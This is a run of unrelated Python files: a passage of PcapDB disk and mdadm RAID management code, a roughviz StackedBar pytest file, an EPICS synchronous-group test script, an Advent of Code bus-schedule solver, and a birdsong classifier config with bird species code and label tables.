raise RuntimeError("Device is not eligible to be a capture because its state is {}"
.format(dev_ob.state))
if task is not None:
task.update_state(state='WORKING', meta={'msg': 'Formatting device. This may take a '
'while.',
'progress': 5})
if status_file:
print("Formatting {} as xfs.".format(dev_ob.dev_path), file=status_file)
if not trial_run:
dev_ob.format_xfs()
if task is not None:
task.update_state(state='WORKING', meta={'msg': 'Finished formating.',
'progress': 25})
# Make sure this disk has a UUID now.
if not dev_ob.uuid:
raise RuntimeError("Could not get uuid of recently formatted disk.")
if status_file:
print("Adding {} to database.".format(dev_ob.dev_path), file=status_file)
# Add the disk to the capture database.
# It's added as disabled so we don't try to use it right away.
disk = Disk(uuid=dev_ob.uuid, mode='DISABLED', size=dev_ob.size)
# Figure out which disk is the biggest so we can reset the usage_inc for each disk.
# When trying to figure out which disk to use next, capture chooses the disk with
# the lowest 'usage'. After using it, the disk's usage is increased by the usage_inc.
# If all disks are the same size, their usage_inc's should all be about 1.
# If they're of different sizes, the increment will be larger for the smaller disks,
# so that those disks will be used less frequently.
max_size = max([d.size for d in Disk.objects.all()] + [dev_ob.size])
disk.usage_inc = max_size/disk.size
if not trial_run:
for d in Disk.objects.all():
# Reset the usage_inc and usage for all disks. If we don't do this, the new
# disk will be used exclusively until it catches up in usage to the old disks.
d.usage_inc = max_size/disk.size
d.usage = 0
d.save()
disk.save()
if task is not None:
task.update_state(state='WORKING', meta={'msg': 'Device mounted and dded device to '
'the system.',
'progress': 30})
if status_file:
print("Mounting {} and filling it with capture slots.".format(dev_ob.dev_path),
file=status_file)
# Fill our new capture disk with capture slots. This also mounts it.
if not trial_run:
try:
disk.populate(task)
except RuntimeError:
disk.umount()
disk.delete()
raise
if status_file:
print("Finished initializing {}.".format(dev_ob.dev_path), file=status_file)
def uninitialize_device(dev, status_file=None):
bd = Device.get_devices()
if dev not in bd.keys():
pass
def _compat_raids(dev, devices):
"""
Find all the compatable RAID arrays for the given device.
:param dev: The device we're comparing to.
:param devices: The dict of device attributes from Device.get_devices()
:return: A list of compatible raid device names.
"""
dev_attr = devices[dev]
compat_raids = set()
for cdev in devices.keys():
cattr = devices[cdev]
# Only consider actual disks. (Though these may not actually be disks at present, could be
# LUNs. Also, the disk must be in an mdadm RAID.
if cattr.type == Device.DISK_TYPE and cattr.raid is not None:
if abs(dev_attr.size - cattr.size) < SIZE_VARIATION:
compat_raids.add(cattr.raid.name)
return compat_raids
def add_spare(spares):
"""Denote a disk as an active spare for mdadm RAID.
- The spare is added to a RAID with similar disks.
- It will be shared amongst RAIDS with similar disks.
:param bool trial_run: Do everything but run the command.
"""
devices = Device.get_devices()
for spare in spares:
if spare not in devices:
raise RuntimeError("No such device: {}.".format(spare))
dev_ob = devices[spare]
if dev_ob.state:
raise RuntimeError("Disk {} already in use: {}.".format(spares, dev_ob.state))
compat_raids = _compat_raids(spare, devices)
if not compat_raids:
raise RuntimeError("No compatible RAID arrays exist.")
# Add the spare to an arbitrary RAID.
raid = list(compat_raids)[0]
err = tempfile.TemporaryFile()
cmd = [settings.SUDO_PATH, ADD_SPARE_CMD, devices[raid].dev_path, dev_ob.dev_path]
log.error('cmd: {}'.format(cmd))
if subprocess.call(cmd, stdout=err, stderr=err) != 0:
err.seek(0)
raise RuntimeError("Could not add spare: {}".format(err.read()))
def remove_spare(spares, trial_run=False):
"""Remove the given spare device from the appropriate RAID, if possible.
This should not be done if the RAID is degraded, as it may be copying data to the spare.
:param bool trial_run: Do everything but run the command."""
devices = Device.get_devices()
for spare in spares:
if spare not in devices:
raise RuntimeError("No such device: {}.".format(spare))
dev_ob = devices[spare]
raid = dev_ob.raid
if raid is not None:
rdisk_state = raid.disks.get(dev_ob.name)
if rdisk_state != 'spare':
raise RuntimeError("Device {} is not a spare.".format(dev_ob.name))
else:
raise RuntimeError("Device {} is not in a RAID.".format(dev_ob.name))
if raid.degraded:
raise RuntimeError("Raid device {} (of which {} is a member) is degraded. "
"Spares should not be removed.".format(raid.name, dev_ob.name))
if trial_run:
return
err = tempfile.TemporaryFile()
cmd = [settings.SUDO_PATH, REMOVE_SPARE_CMD, raid.dev_path, dev_ob.dev_path]
if subprocess.call(cmd, stdout=err, stderr=err) != 0:
err.seek(0)
raise RuntimeError("Could not remove spare: {}".format(err.read()))
def write_mdadm_config(outfile='/etc/mdadm.conf'):
"""
Write out an mdadm config for the detected RAID devices.
:param str outfile: Where the config will be written.
"""
md = Device.get_devices()
raids = [md[dev] for dev in md.keys() if md[dev].type == Device.MD_TYPE]
conf = io.StringIO()
def write(line):
conf.write(line)
conf.write('\n')
write('# This configuration is generated automatically by PcapDB. It should not be '
'edited manually.\n')
write('# Send alerts here. This depends on mdadm monitor running in scan mode.')
if hasattr(settings, 'disk_admin'):
write('MAILADDR {}'.format(settings.disk_admin))
else:
write('# MAILADDR (Could not find an address in settings.disk_admin)')
write('')
write('# Automatically search for devices in /proc/partitions.')
write('DEVICE partitions')
write('')
# Figure out what spare groups we need.
spare_groups = {}
for raid in raids:
for disk in raid.disks.keys():
found = False
for group in spare_groups:
if abs(group - md[disk].size) < SIZE_VARIATION:
spare_groups[group].add(raid)
found = True
break
if not found:
spare_groups[md[disk].size] = {raid}
# We need to create a mapping from raid to spare_groups, and make sure our groups make sense
raid_groups = {}
for group in spare_groups:
for raid in spare_groups[group]:
if raid in raid_groups and group != raid_groups[raid]:
raise RuntimeError("Raid has disks in multiple spare groups.")
else:
raid_groups[raid] = group
# We need more sane names than the raw size of the disk.
spare_group_names = {}
i = 0
for group in sorted(spare_groups.keys()):
spare_group_names[group] = 'group{0:d}'.format(i)
i += 1
# Now we can finally add the ARRAY lines to the config file.
for raid in raids:
sg_name = spare_group_names[raid_groups[raid]]
if raid.uuid is not None:
write('ARRAY {raid.dev_path} level={raid.level} num-devices={raid.count:d} '
'UUID={raid.uuid} spares={raid.spares} spare-group={spare_group}'.format(
raid=raid, spare_group=sg_name))
else:
write('ARRAY {raid.dev_path} level={raid.level} num-devices={raid.count:d} '
'spares={raid.spares} spare-group={spare_group}'.format(
raid=raid, spare_group=sg_name))
conf.seek(0)
if outfile == '-':
sys.stdout.write(conf.read())
else:
conf_file = open(outfile, 'w')
conf_file.write(conf.read())
conf_file.close()
def init_index_device(*devices, task=None):
"""
Initialize a set of disks to serve as our index device.
- There can only be one index device.
- Two disks are expected and combined as a RAID 1, though a single disk can be used as well.
- Additional disks are added as spares.
:param devices: The disks to include in the RAID.
:param task: celery.Task
:return: None
:raises: ValueError, RuntimeError
"""
bd = Device.get_devices()
dev_obs = []
# Make sure the disks are suitable for use.
for dev in devices:
if dev not in bd:
raise RuntimeError("Can't find disk: {}.".format(dev))
dev_ob = bd[dev]
if dev_ob.state:
raise RuntimeError("Disk {} already in use: {}".format(dev, dev_ob.state))
dev_obs.append(dev_ob)
# Make sure the disks are reasonably close in size.
base = dev_obs[0].size
for dev_ob in dev_obs[1:]:
if abs(dev_ob.size - base) >= SIZE_VARIATION:
raise RuntimeError("Disk sizes are too different. {d1.dev_path} - {d1.size_hr()}, "
"{d2.dev_path} - {d2.size_hr()}".format(d1=base, d2=dev_ob))
if not devices:
raise ValueError("You must specify at least one devices.")
md_num = _next_md(bd)
# Create a RAID 1, but with only one workind disk.
mdadm_cmd = [settings.SUDO_PATH, CREATE_INDEX_CMD, '/dev/md{0:d}'.format(md_num),
dev_obs[0].dev_path]
log.info('create index raid command:{}'.format(mdadm_cmd))
proc = subprocess.Popen(mdadm_cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, stdin=subprocess.PIPE)
outs, errs = proc.communicate(input=b'y', timeout=5)
if proc.poll() != 0:
raise RuntimeError("Raid creation failed: {}.".format(errs))
if len(dev_obs) == 2:
# Now add the second disk as a spare
mdadm_add_cmd = [settings.SUDO_PATH, ADD_SPARE_CMD, '/dev/md{0:d}'.format(md_num),
dev_obs[1].dev_path]
proc = subprocess.Popen(mdadm_add_cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, stdin=subprocess.PIPE)
outs, errs = proc.communicate(input=b'y', timeout=5)
if proc.poll() != 0:
raise RuntimeError("Fail/ed to add second device: {}.".format(errs))
if task is not None:
task.update_state(state='WORKING', meta={'msg': 'Formatting device. This may take a '
'while.',
'progress': 5})
index_device = MDRaidDevice('md{0:d}'.format(md_num))
index_device.format_xfs(label=settings.INDEX_DEV_LABEL)
return index_device
def find_index_device():
"""
Find the device that should be our index device by label. Note that this there is
a delay between filesystem creation and the appearance of the label.
:return: None or Device
:rtype: None or Device
"""
subprocess.call([settings.SUDO_PATH, UDEV_TRIGGER_CMD],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
idx_dev = None
for dev_ob in Device.get_devices().values():
if dev_ob.label == settings.INDEX_DEV_LABEL:
if idx_dev is None:
idx_dev = dev_ob
else:
raise RuntimeError("Multiple index devices. {} and {}."
.format(dev_ob.uuid, idx_dev.uuid))
return idx_dev
|
1689646
|
import pytest
import pandas as pd
from roughviz.charts.stacked_bar import StackedBar
def test_wrong_type_data():
wrong_data = {"loc": ["North", "South", "East", "West"], "values": [10, 5, 8, 3]}
match = "Only valid type of data is list"
with pytest.raises(TypeError, match=match):
StackedBar(data=wrong_data, labels="loc")
def test_wrong_list_data():
wrong_data = [
{"month": "Jan", "A": 20, "B": 5},
{"month": "Feb", "A": 25, "B": 10},
[1, 2, 3],
]
match = "All elements in data need to be dictionary"
with pytest.raises(TypeError, match=match):
StackedBar(data=wrong_data, labels="month")
def test_wrong_label():
data = [{"month": "Jan", "A": 20, "B": 5}, {"month": "Feb", "A": 25, "B": 10}]
match = "Label has be to one of labels in data"
with pytest.raises(ValueError, match=match):
StackedBar(data=data, labels="not_exist")
def test_change_options_dict_data():
data = [{"month": "Jan", "A": 20, "B": 5}, {"month": "Feb", "A": 25, "B": 10}]
sb = StackedBar(data=data, labels="month")
# Since Pie Plot does not have axisFontSize option, so should raise error
with pytest.raises(KeyError):
assert sb.opts["legend"]
assert sb.opts["title"] == ""
sb.set_options(title="StackBar")
assert sb.opts["title"] == "StackBar"
def test_raise_error_with_dataframe():
df = pd.DataFrame({"a": [1, 2], "b": ["a", "b"]})
with pytest.raises(TypeError):
StackedBar(data=df, labels="a")
|
1689716
|
from __future__ import print_function
import time
import epics
import pvnames
print('== Test get/put for synchronous groups')
pvs = pvnames.motor_list
chids = [epics.ca.create_channel(pvname) for pvname in pvs]
for chid in chids:
epics.ca.connect_channel(chid)
epics.ca.put(chid, 0)
print('Now create synch group ')
sg = epics.ca.sg_create()
data = [epics.ca.sg_get(sg, chid) for chid in chids]
print('Now change these PVs for the next 10 seconds')
time.sleep(10.0)
print('Synchronous block:')
epics.ca.sg_block(sg)
print('Done. Values')
for pvname, dat, chid in zip(pvs, data, chids):
print("%s = %s" % (pvname, str( epics.ca._unpack(dat, chid=chid))))
epics.ca.sg_reset(sg)
print('OK, now we will put everything back to 0 synchronously')
for chid in chids:
epics.ca.sg_put(sg, chid, 0)
print('sg_put done, but not blocked / commited. Sleep for 5 seconds ')
time.sleep(5.0)
print('Now Go: ')
epics.ca.sg_block(sg)
print('done.')
|
1689748
|
import time,os
import re
from modint import chinese_remainder
def profiler(method):
def wrapper_method(*arg, **kw):
t = time.time()
ret = method(*arg, **kw)
print('Method ' + method.__name__ +' took : ' + "{:2.5f}".format(time.time()-t) + ' sec')
return ret
return wrapper_method
@profiler
def part1():
l = open('input.txt', 'r').read().split('\n')
bound = int(l[0])
ids = list(map(int , re.findall(r'\d+' , l[1])))
delay = bound
chosen_bus = 0
for bus in ids:
n_dep = bound // bus + 1
if (n_dep*bus - bound) < delay :
delay = n_dep*bus - bound
chosen_bus = bus
print(chosen_bus*delay)
@profiler
def part2():
l = open('input.txt', 'r').read().split('\n')
l = l[1].split(',')
sched = []
for idx,bus in enumerate(l):
if bus == 'x':
continue
sched.append((int(bus) , idx))
'''
st_n = 760000000000000 // sched[0][0] + 1
for i in range(10000000000,11000000000):
found = True
for ele in sched[1:] :
if ((st_n + i) * sched[0][0] + ele[1]) % ele[0] != 0 :
found = False
break
if found :
print( i , (st_n + i) * sched[0][0])
break
'''
ids = []
rems = []
for ele in sched:
ids.append(ele[0])
rems.append( -ele[1] % ele[0])
print(chinese_remainder(ids,rems))
answer = sched[0][0]
inc = sched[0][0]
for ele in sched[1:]:
found = False
while not found:
answer += inc
if (answer + ele[1]) % ele[0] == 0:
found = True
inc *= ele[0]
print(answer)
if __name__ == "__main__":
part1()
part2()
|
1689807
|
import string
from pathlib import Path
class AUDIO_CONFIG:
sampling_rate = 32000
duration = 1
hop_length = 251 # making it 128 in size
fmin = 500
fmax = 15000
n_mels = 128
n_fft = n_mels * 20
samples = sampling_rate * duration
padmode = 'reflect'
def fill_range(letter_start, letter_end, path_fill, dict_val={}):
alphabet = list(string.ascii_lowercase)
for a in alphabet[alphabet.index(letter_start):alphabet.index(letter_end)+1]:
dict_val[a] = path_fill
return dict_val
def get_dict_value(input_dir):
dict_val = {}
dict_val = fill_range('a','b',input_dir/"birdsong-resampled-train-audio-00",dict_val)
dict_val = fill_range('c','f',input_dir/"birdsong-resampled-train-audio-01",dict_val)
dict_val = fill_range('g','m',input_dir/"birdsong-resampled-train-audio-02",dict_val)
dict_val = fill_range('n','r',input_dir/"birdsong-resampled-train-audio-03",dict_val)
dict_val = fill_range('s','y',input_dir/"birdsong-resampled-train-audio-04",dict_val)
return dict_val
BIRD_CODE = {
'aldfly': 0, 'ameavo': 1, 'amebit': 2, 'amecro': 3, 'amegfi': 4,
'amekes': 5, 'amepip': 6, 'amered': 7, 'amerob': 8, 'amewig': 9,
'amewoo': 10, 'amtspa': 11, 'annhum': 12, 'astfly': 13, 'baisan': 14,
'baleag': 15, 'balori': 16, 'banswa': 17, 'barswa': 18, 'bawwar': 19,
'belkin1': 20, 'belspa2': 21, 'bewwre': 22, 'bkbcuc': 23, 'bkbmag1': 24,
'bkbwar': 25, 'bkcchi': 26, 'bkchum': 27, 'bkhgro': 28, 'bkpwar': 29,
'bktspa': 30, 'blkpho': 31, 'blugrb1': 32, 'blujay': 33, 'bnhcow': 34,
'boboli': 35, 'bongul': 36, 'brdowl': 37, 'brebla': 38, 'brespa': 39,
'brncre': 40, 'brnthr': 41, 'brthum': 42, 'brwhaw': 43, 'btbwar': 44,
'btnwar': 45, 'btywar': 46, 'buffle': 47, 'buggna': 48, 'buhvir': 49,
'bulori': 50, 'bushti': 51, 'buwtea': 52, 'buwwar': 53, 'cacwre': 54,
'calgul': 55, 'calqua': 56, 'camwar': 57, 'cangoo': 58, 'canwar': 59,
'canwre': 60, 'carwre': 61, 'casfin': 62, 'caster1': 63, 'casvir': 64,
'cedwax': 65, 'chispa': 66, 'chiswi': 67, 'chswar': 68, 'chukar': 69,
'clanut': 70, 'cliswa': 71, 'comgol': 72, 'comgra': 73, 'comloo': 74,
'commer': 75, 'comnig': 76, 'comrav': 77, 'comred': 78, 'comter': 79,
'comyel': 80, 'coohaw': 81, 'coshum': 82, 'cowscj1': 83, 'daejun': 84,
'doccor': 85, 'dowwoo': 86, 'dusfly': 87, 'eargre': 88, 'easblu': 89,
'easkin': 90, 'easmea': 91, 'easpho': 92, 'eastow': 93, 'eawpew': 94,
'eucdov': 95, 'eursta': 96, 'evegro': 97, 'fiespa': 98, 'fiscro': 99,
'foxspa': 100, 'gadwal': 101, 'gcrfin': 102, 'gnttow': 103, 'gnwtea': 104,
'gockin': 105, 'gocspa': 106, 'goleag': 107, 'grbher3': 108, 'grcfly': 109,
'greegr': 110, 'greroa': 111, 'greyel': 112, 'grhowl': 113, 'grnher': 114,
'grtgra': 115, 'grycat': 116, 'gryfly': 117, 'haiwoo': 118, 'hamfly': 119,
'hergul': 120, 'herthr': 121, 'hoomer': 122, 'hoowar': 123, 'horgre': 124,
'horlar': 125, 'houfin': 126, 'houspa': 127, 'houwre': 128, 'indbun': 129,
'juntit1': 130, 'killde': 131, 'labwoo': 132, 'larspa': 133, 'lazbun': 134,
'leabit': 135, 'leafly': 136, 'leasan': 137, 'lecthr': 138, 'lesgol': 139,
'lesnig': 140, 'lesyel': 141, 'lewwoo': 142, 'linspa': 143, 'lobcur': 144,
'lobdow': 145, 'logshr': 146, 'lotduc': 147, 'louwat': 148, 'macwar': 149,
'magwar': 150, 'mallar3': 151, 'marwre': 152, 'merlin': 153, 'moublu': 154,
'mouchi': 155, 'moudov': 156, 'norcar': 157, 'norfli': 158, 'norhar2': 159,
'normoc': 160, 'norpar': 161, 'norpin': 162, 'norsho': 163, 'norwat': 164,
'nrwswa': 165, 'nutwoo': 166, 'olsfly': 167, 'orcwar': 168, 'osprey': 169,
'ovenbi1': 170, 'palwar': 171, 'pasfly': 172, 'pecsan': 173, 'perfal': 174,
'phaino': 175, 'pibgre': 176, 'pilwoo': 177, 'pingro': 178, 'pinjay': 179,
'pinsis': 180, 'pinwar': 181, 'plsvir': 182, 'prawar': 183, 'purfin': 184,
'pygnut': 185, 'rebmer': 186, 'rebnut': 187, 'rebsap': 188, 'rebwoo': 189,
'redcro': 190, 'redhea': 191, 'reevir1': 192, 'renpha': 193, 'reshaw': 194,
'rethaw': 195, 'rewbla': 196, 'ribgul': 197, 'rinduc': 198, 'robgro': 199,
'rocpig': 200, 'rocwre': 201, 'rthhum': 202, 'ruckin': 203, 'rudduc': 204,
'rufgro': 205, 'rufhum': 206, 'rusbla': 207, 'sagspa1': 208, 'sagthr': 209,
'savspa': 210, 'saypho': 211, 'scatan': 212, 'scoori': 213, 'semplo': 214,
'semsan': 215, 'sheowl': 216, 'shshaw': 217, 'snobun': 218, 'snogoo': 219,
'solsan': 220, 'sonspa': 221, 'sora': 222, 'sposan': 223, 'spotow': 224,
'stejay': 225, 'swahaw': 226, 'swaspa': 227, 'swathr': 228, 'treswa': 229,
'truswa': 230, 'tuftit': 231, 'tunswa': 232, 'veery': 233, 'vesspa': 234,
'vigswa': 235, 'warvir': 236, 'wesblu': 237, 'wesgre': 238, 'weskin': 239,
'wesmea': 240, 'wessan': 241, 'westan': 242, 'wewpew': 243, 'whbnut': 244,
'whcspa': 245, 'whfibi': 246, 'whtspa': 247, 'whtswi': 248, 'wilfly': 249,
'wilsni1': 250, 'wiltur': 251, 'winwre3': 252, 'wlswar': 253, 'wooduc': 254,
'wooscj2': 255, 'woothr': 256, 'y00475': 257, 'yebfly': 258, 'yebsap': 259,
'yehbla': 260, 'yelwar': 261, 'yerwar': 262, 'yetvir': 263
}
EBIRD_LABEL = {'aldfly': 'Empidonax alnorum_Alder Flycatcher',
'ameavo': 'Recurvirostra americana_American Avocet',
'amebit': 'Botaurus lentiginosus_American Bittern',
'amecro': 'Corvus brachyrhynchos_American Crow',
'amegfi': 'Spinus tristis_American Goldfinch',
'amekes': 'Falco sparverius_American Kestrel',
'amepip': 'Anthus rubescens_American Pipit',
'amered': 'Setophaga ruticilla_American Redstart',
'amerob': 'Turdus migratorius_American Robin',
'amewig': 'Mareca americana_American Wigeon',
'amewoo': 'Scolopax minor_American Woodcock',
'amtspa': 'Spizelloides arborea_American Tree Sparrow',
'annhum': "Calypte anna_Anna's Hummingbird",
'astfly': 'Myiarchus cinerascens_Ash-throated Flycatcher',
'baisan': "Calidris bairdii_Baird's Sandpiper",
'baleag': 'Haliaeetus leucocephalus_Bald Eagle',
'balori': 'Icterus galbula_Baltimore Oriole',
'banswa': 'Riparia riparia_Bank Swallow',
'barswa': 'Hirundo rustica_Barn Swallow',
'bawwar': 'Mniotilta varia_Black-and-white Warbler',
'belkin1': 'Megaceryle alcyon_Belted Kingfisher',
'belspa2': "Artemisiospiza belli_Bell's Sparrow",
'bewwre': "Thryomanes bewickii_Bewick's Wren",
'bkbcuc': 'Coccyzus erythropthalmus_Black-billed Cuckoo',
'bkbmag1': 'Pica hudsonia_Black-billed Magpie',
'bkbwar': 'Setophaga fusca_Blackburnian Warbler',
'bkcchi': 'Poecile atricapillus_Black-capped Chickadee',
'bkchum': 'Archilochus alexandri_Black-chinned Hummingbird',
'bkhgro': 'Pheucticus melanocephalus_Black-headed Grosbeak',
'bkpwar': 'Setophaga striata_Blackpoll Warbler',
'bktspa': 'Amphispiza bilineata_Black-throated Sparrow',
'blkpho': 'Sayornis nigricans_Black Phoebe',
'blugrb1': 'Passerina caerulea_Blue Grosbeak',
'blujay': 'Cyanocitta cristata_Blue Jay',
'bnhcow': 'Molothrus ater_Brown-headed Cowbird',
'boboli': 'Dolichonyx oryzivorus_Bobolink',
'bongul': "Chroicocephalus philadelphia_Bonaparte's Gull",
'brdowl': 'Strix varia_Barred Owl',
'brebla': "Euphagus cyanocephalus_Brewer's Blackbird",
'brespa': "Spizella breweri_Brewer's Sparrow",
'brncre': 'Certhia americana_Brown Creeper',
'brnthr': 'Toxostoma rufum_Brown Thrasher',
'brthum': 'Selasphorus platycercus_Broad-tailed Hummingbird',
'brwhaw': 'Buteo platypterus_Broad-winged Hawk',
'btbwar': 'Setophaga caerulescens_Black-throated Blue Warbler',
'btnwar': 'Setophaga virens_Black-throated Green Warbler',
'btywar': 'Setophaga nigrescens_Black-throated Gray Warbler',
'buffle': 'Bucephala albeola_Bufflehead',
'buggna': 'Polioptila caerulea_Blue-gray Gnatcatcher',
'buhvir': 'Vireo solitarius_Blue-headed Vireo',
'bulori': "Icterus bullockii_Bullock's Oriole",
'bushti': 'Psaltriparus minimus_Bushtit',
'buwtea': 'Spatula discors_Blue-winged Teal',
'buwwar': 'Vermivora cyanoptera_Blue-winged Warbler',
'cacwre': 'Campylorhynchus brunneicapillus_Cactus Wren',
'calgul': 'Larus californicus_California Gull',
'calqua': 'Callipepla californica_California Quail',
'camwar': 'Setophaga tigrina_Cape May Warbler',
'cangoo': 'Branta canadensis_Canada Goose',
'canwar': 'Cardellina canadensis_Canada Warbler',
'canwre': 'Catherpes mexicanus_Canyon Wren',
'carwre': 'Thryothorus ludovicianus_Carolina Wren',
'casfin': "Haemorhous cassinii_Cassin's Finch",
'caster1': 'Hydroprogne caspia_Caspian Tern',
'casvir': "Vireo cassinii_Cassin's Vireo",
'cedwax': 'Bombycilla cedrorum_Cedar Waxwing',
'chispa': 'Spizella passerina_Chipping Sparrow',
'chiswi': 'Chaetura pelagica_Chimney Swift',
'chswar': 'Setophaga pensylvanica_Chestnut-sided Warbler',
'chukar': 'Alectoris chukar_Chukar',
'clanut': "Nucifraga columbiana_Clark's Nutcracker",
'cliswa': 'Petrochelidon pyrrhonota_Cliff Swallow',
'comgol': 'Bucephala clangula_Common Goldeneye',
'comgra': 'Quiscalus quiscula_Common Grackle',
'comloo': 'Gavia immer_Common Loon',
'commer': 'Mergus merganser_Common Merganser',
'comnig': 'Chordeiles minor_Common Nighthawk',
'comrav': 'Corvus corax_Common Raven',
'comred': 'Acanthis flammea_Common Redpoll',
'comter': 'Sterna hirundo_Common Tern',
'comyel': 'Geothlypis trichas_Common Yellowthroat',
'coohaw': "Accipiter cooperii_Cooper's Hawk",
'coshum': "Calypte costae_Costa's Hummingbird",
'cowscj1': 'Aphelocoma californica_California Scrub-Jay',
'daejun': 'Junco hyemalis_Dark-eyed Junco',
'doccor': 'Phalacrocorax auritus_Double-crested Cormorant',
'dowwoo': 'Dryobates pubescens_Downy Woodpecker',
'dusfly': 'Empidonax oberholseri_Dusky Flycatcher',
'eargre': 'Podiceps nigricollis_Eared Grebe',
'easblu': 'Sialia sialis_Eastern Bluebird',
'easkin': 'Tyrannus tyrannus_Eastern Kingbird',
'easmea': 'Sturnella magna_Eastern Meadowlark',
'easpho': 'Sayornis phoebe_Eastern Phoebe',
'eastow': 'Pipilo erythrophthalmus_Eastern Towhee',
'eawpew': 'Contopus virens_Eastern Wood-Pewee',
'eucdov': 'Streptopelia decaocto_Eurasian Collared-Dove',
'eursta': 'Sturnus vulgaris_European Starling',
'evegro': 'Coccothraustes vespertinus_Evening Grosbeak',
'fiespa': 'Spizella pusilla_Field Sparrow',
'fiscro': 'Corvus ossifragus_Fish Crow',
'foxspa': 'Passerella iliaca_Fox Sparrow',
'gadwal': 'Mareca strepera_Gadwall',
'gcrfin': 'Leucosticte tephrocotis_Gray-crowned Rosy-Finch',
'gnttow': 'Pipilo chlorurus_Green-tailed Towhee',
'gnwtea': 'Anas crecca_Green-winged Teal',
'gockin': 'Regulus satrapa_Golden-crowned Kinglet',
'gocspa': 'Zonotrichia atricapilla_Golden-crowned Sparrow',
'goleag': 'Aquila chrysaetos_Golden Eagle',
'grbher3': 'Ardea herodias_Great Blue Heron',
'grcfly': 'Myiarchus crinitus_Great Crested Flycatcher',
'greegr': 'Ardea alba_Great Egret',
'greroa': 'Geococcyx californianus_Greater Roadrunner',
'greyel': 'Tringa melanoleuca_Greater Yellowlegs',
'grhowl': 'Bubo virginianus_Great Horned Owl',
'grnher': 'Butorides virescens_Green Heron',
'grtgra': 'Quiscalus mexicanus_Great-tailed Grackle',
'grycat': 'Dumetella carolinensis_Gray Catbird',
'gryfly': 'Empidonax wrightii_Gray Flycatcher',
'haiwoo': 'Dryobates villosus_Hairy Woodpecker',
'hamfly': "Empidonax hammondii_Hammond's Flycatcher",
'hergul': 'Larus argentatus_Herring Gull',
'herthr': 'Catharus guttatus_Hermit Thrush',
'hoomer': 'Lophodytes cucullatus_Hooded Merganser',
'hoowar': 'Setophaga citrina_Hooded Warbler',
'horgre': 'Podiceps auritus_Horned Grebe',
'horlar': 'Eremophila alpestris_Horned Lark',
'houfin': 'Haemorhous mexicanus_House Finch',
'houspa': 'Passer domesticus_House Sparrow',
'houwre': 'Troglodytes aedon_House Wren',
'indbun': 'Passerina cyanea_Indigo Bunting',
'juntit1': 'Baeolophus ridgwayi_Juniper Titmouse',
'killde': 'Charadrius vociferus_Killdeer',
'labwoo': 'Dryobates scalaris_Ladder-backed Woodpecker',
'larspa': 'Chondestes grammacus_Lark Sparrow',
'lazbun': 'Passerina amoena_Lazuli Bunting',
'leabit': 'Ixobrychus exilis_Least Bittern',
'leafly': 'Empidonax minimus_Least Flycatcher',
'leasan': 'Calidris minutilla_Least Sandpiper',
'lecthr': "Toxostoma lecontei_LeConte's Thrasher",
'lesgol': 'Spinus psaltria_Lesser Goldfinch',
'lesnig': 'Chordeiles acutipennis_Lesser Nighthawk',
'lesyel': 'Tringa flavipes_Lesser Yellowlegs',
'lewwoo': "Melanerpes lewis_Lewis's Woodpecker",
'linspa': "Melospiza lincolnii_Lincoln's Sparrow",
'lobcur': 'Numenius americanus_Long-billed Curlew',
'lobdow': 'Limnodromus scolopaceus_Long-billed Dowitcher',
'logshr': 'Lanius ludovicianus_Loggerhead Shrike',
'lotduc': 'Clangula hyemalis_Long-tailed Duck',
'louwat': 'Parkesia motacilla_Louisiana Waterthrush',
'macwar': "Geothlypis tolmiei_MacGillivray's Warbler",
'magwar': 'Setophaga magnolia_Magnolia Warbler',
'mallar3': 'Anas platyrhynchos_Mallard',
'marwre': 'Cistothorus palustris_Marsh Wren',
'merlin': 'Falco columbarius_Merlin',
'moublu': 'Sialia currucoides_Mountain Bluebird',
'mouchi': 'Poecile gambeli_Mountain Chickadee',
'moudov': 'Zenaida macroura_Mourning Dove',
'norcar': 'Cardinalis cardinalis_Northern Cardinal',
'norfli': 'Colaptes auratus_Northern Flicker',
'norhar2': 'Circus hudsonius_Northern Harrier',
'normoc': 'Mimus polyglottos_Northern Mockingbird',
'norpar': 'Setophaga americana_Northern Parula',
'norpin': 'Anas acuta_Northern Pintail',
'norsho': 'Spatula clypeata_Northern Shoveler',
'norwat': 'Parkesia noveboracensis_Northern Waterthrush',
'nrwswa': 'Stelgidopteryx serripennis_Northern Rough-winged Swallow',
'nutwoo': "Dryobates nuttallii_Nuttall's Woodpecker",
'olsfly': 'Contopus cooperi_Olive-sided Flycatcher',
'orcwar': 'Leiothlypis celata_Orange-crowned Warbler',
'osprey': 'Pandion haliaetus_Osprey',
'ovenbi1': 'Seiurus aurocapilla_Ovenbird',
'palwar': 'Setophaga palmarum_Palm Warbler',
'pasfly': 'Empidonax difficilis_Pacific-slope Flycatcher',
'pecsan': 'Calidris melanotos_Pectoral Sandpiper',
'perfal': 'Falco peregrinus_Peregrine Falcon',
'phaino': 'Phainopepla nitens_Phainopepla',
'pibgre': 'Podilymbus podiceps_Pied-billed Grebe',
'pilwoo': 'Dryocopus pileatus_Pileated Woodpecker',
'pingro': 'Pinicola enucleator_Pine Grosbeak',
'pinjay': 'Gymnorhinus cyanocephalus_Pinyon Jay',
'pinsis': 'Spinus pinus_Pine Siskin',
'pinwar': 'Setophaga pinus_Pine Warbler',
'plsvir': 'Vireo plumbeus_Plumbeous Vireo',
'prawar': 'Setophaga discolor_Prairie Warbler',
'purfin': 'Haemorhous purpureus_Purple Finch',
'pygnut': 'Sitta pygmaea_Pygmy Nuthatch',
'rebmer': 'Mergus serrator_Red-breasted Merganser',
'rebnut': 'Sitta canadensis_Red-breasted Nuthatch',
'rebsap': 'Sphyrapicus ruber_Red-breasted Sapsucker',
'rebwoo': 'Melanerpes carolinus_Red-bellied Woodpecker',
'redcro': 'Loxia curvirostra_Red Crossbill',
'redhea': 'Aythya americana_Redhead',
'reevir1': 'Vireo olivaceus_Red-eyed Vireo',
'renpha': 'Phalaropus lobatus_Red-necked Phalarope',
'reshaw': 'Buteo lineatus_Red-shouldered Hawk',
'rethaw': 'Buteo jamaicensis_Red-tailed Hawk',
'rewbla': 'Agelaius phoeniceus_Red-winged Blackbird',
'ribgul': 'Larus delawarensis_Ring-billed Gull',
'rinduc': 'Aythya collaris_Ring-necked Duck',
'robgro': 'Pheucticus ludovicianus_Rose-breasted Grosbeak',
'rocpig': 'Columba livia_Rock Pigeon',
'rocwre': 'Salpinctes obsoletus_Rock Wren',
'rthhum': 'Archilochus colubris_Ruby-throated Hummingbird',
